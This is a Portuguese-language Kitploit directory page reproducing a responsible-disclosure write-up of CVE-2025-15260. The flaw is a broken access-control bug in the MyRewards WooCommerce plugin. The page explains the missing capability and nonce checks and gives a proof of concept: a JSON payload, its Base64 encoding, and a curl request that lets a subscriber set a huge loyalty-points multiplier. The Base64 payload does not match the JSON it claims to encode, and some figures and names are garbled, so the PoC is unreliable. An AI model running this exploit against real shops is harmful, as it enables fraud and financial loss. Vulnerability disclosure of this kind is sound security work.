Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-15260 — Falta de Autorização / Controle de Acesso Quebrado no Plugin - MyRewards – Pontos de Fidelidade e Recompensas para WooCommerce | Kitploit
Ferramentas/GitHubGitHub/d3kc4rt1/cve-2025-15260
Escalada de PrivilégiosAnálise de VulnerabilidadesExploração de Aplicações WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubd3kc4rt1/cve-2025-15260

CVE-2025-15260

Falta de Autorização / Controle de Acesso Quebrado no Plugin - MyRewards – Pontos de Fidelidade e Recompensas para WooCommerce

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-15260: Autorização Ausente / Controle de Acesso Quebrado no Plugin - MyRewards – Pontos de Fidelidade e Recompensas para WooCommerce

Aviso: Este repositório foi criado apenas para fins educacionais e divulgação ética. A vulnerabilidade foi reportada de forma responsável ao fornecedor e corrigida. Não utilize estas informações para explorar sistemas sem a devida autorização.

Resumo

Uma vulnerabilidade crítica de Controle de Acesso Quebrado / Escalação de Privilégio foi descoberta no plugin MyRewards (WooRewards) para WooCommerce (versões <= 5.6.0). Esta falha permite que qualquer usuário logado, incluindo aqueles com privilégios mínimos como Assinantes, burle a autorização e modifique regras sensíveis de recompensas da loja.

Ao explorar esta vulnerabilidade, um atacante pode inflar seu multiplicador de pontos de fidelidade para um valor astronômico (por exemplo, h999,999,999'), permitindo acumular pontos massivos a partir de uma única compra pequena e resgatá-los por cupons ou produtos gratuitos, resultando em perda financeira direta para a loja.

Visão Geral da Vulnerabilidade

  • CVE ID: CVE-2025-15260
  • Produto: MyRewards by LongwayStudio (Plugin WooCommerce)
  • Versões Afetadas: <= 5.6.0
  • Tipo de Vulnerabilidade: Controle de Acesso Quebrado / Escalação de Privilégio (CWE-284)
  • Privilégios Necessários: Autenticado (Assinante ou superior)

Análise Técnica e Causa Raiz

A causa raiz desta vulnerabilidade reside na falha em implementar Verificações de Capacidade ou proteção CSRF em endpoints AJAX críticos que manipulam modificações no banco de dados.

1. Registro de AJAX Não Autorizado: O plugin utiliza uma classe de controlador genérica (EditlistControler) para gerenciar operações CRUD. Em editlistcontroler.php, ele registra a ação AJAX editlist usando o hook gwp_ajax_`, tornando-a disponível para TODOS os usuários logados, independentemente de sua função:

root@kitploit:~
add_action('wp_ajax_lws_adminpanel_editlist', array($this, 'ajax'));

2. Ausência de Autorização e Validação de Nonce: Dentro dos métodos ajax() e accept(), o código processa requisições de alteração de estado (por exemplo, put para atualizar, del para deletar) baseando-se apenas na entrada do usuário. Ele não faz nenhuma chamada a current_user_can() e check_ajax_referer(), significando que não há verificação se o usuário tem direitos manage_woocommerce.

3. Processamento Perigoso de Payload: O endpoint aceita uma string JSON codificada em Base64 através do parâmetro line, que é decodificada e passada diretamente para o método EventList::write()p, salvando as configurações maliciosas diretamente no banco de dados:

root@kitploit:~
$data = json_decode(base64_decode($line), true);
$this->m_Source->write($data);

Impacto nos Negócios

  • Perda Financeira: Ao manipular o multiplicador de pontos "Valor do Pedido", atores mal-intencionados podem gerar pontos de recompensa infinitos e trocá-los por cupons de desconto de alto valor ou itens gratuitos, contornando o gateway de pagamento do ecommerce.
  • Escalação de Privilégio: Um cliente comum (Assinante) pode realizar ações de administração do plugin.
  • Comprometimento da Integridade dos Dados: Atacantes podem desconfigurar, alterar ou excluir regras de recompensa legítimas existentes, interrompendo a lógica de marketing da loja.

Prova de Conceito (PoC)

Os passos a seguir demonstram como um Assinante autenticado pode explorar esta falha.

1. Pré-requisitos

  • Alvo executando WooCommerce com MyRewards v5.6.0.
  • Credenciais válidas para uma conta de nível subscriber.
  • Um sistema de recompensa pré-configurado (por exemplo, regra de ganho "Gastar dinheiro"). Nota: O ID desta regra (ex., 101) é sequencial e facilmente enumerável observando respostas de postagens AJAX.

2. Payload

Queremos atualizar o multiplicador de pontos da Regra ID 101 para 999,999,999,999,999.

JSON Inicial

root@kitploit:~
{
  "post_id":"101",
  "wre_type":"lws_woorewards_events_orderamount",
  "lws_woorewards_events_orderamount_multiplier": "999999999999999"
}

Codificado em Base64 ('valor de line')

root@kitploit:~
eyJwb3N0X2lkIjoiMTAxIiwid3JlX3R5cGUiOiJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnQiLCJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnRfbWVsdGlwbGl1ciI6ICI5OTk5OTk5OTk5OTk5OTk5In0

3. Execute o Ataque

Execute a seguinte requisição CURL como um usuário de baixo privilégio:

root@kitploit:~
curl -i -X POST 'http://TARGET_SITE/wp-admin/admin-ajax.php' \
    -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
    -b '[Subscriber_Cookies_Here]' \
    -d 'action=lws_adminpanel_editlist&method=put&id=EventList&line=eyJwb3N0X2lkIjoiMTAxIiwid3JlX3R5cGUiOiJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnQiLCJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnRfbWVsdGlwbGl1ciI6ICI5OTk5OTk5OTk5OTk5OTk5In0'

4. Verificação

  • Visão do atacante: O servidor retornará {"status":1} confirmando a atualização.
  • Visão do administrador: Se um Admin visitar as Configurações de Fidelidade, verá que o multiplicador de pontos para pedidos foi alterado para o valor astronômico injetado pelo atacante.

Correção

Para corrigir este problema, atualize o plugin MyRewards para a versão corrigida mais recente. O fornecedor resolveu isso:

  1. Implementando verificações current_user_can() dentro do controlador AJAX para verificar privilégios administrativos.
  2. Adicionando check_ajax_referer() para validar nonces e prevenir Cross-Site Request Forgery (CSRF).

Cronograma

Um breve registro do processo de divulgação para mostrar que os padrões éticos foram seguidos:

  • Data (2025-12-29): Reportado ao Wordfence / Desenvolvedor.
  • Data (2026-02-09): Vulnerabilidade corrigida / Divulgação pública.

Referências e Créditos

  • Banco de Dados de Vulnerabilidades do Wordfence
  • CVE-2025-15260 no NVD
  • Plugin MyRewards no WordPress.org
Baixar ferramenta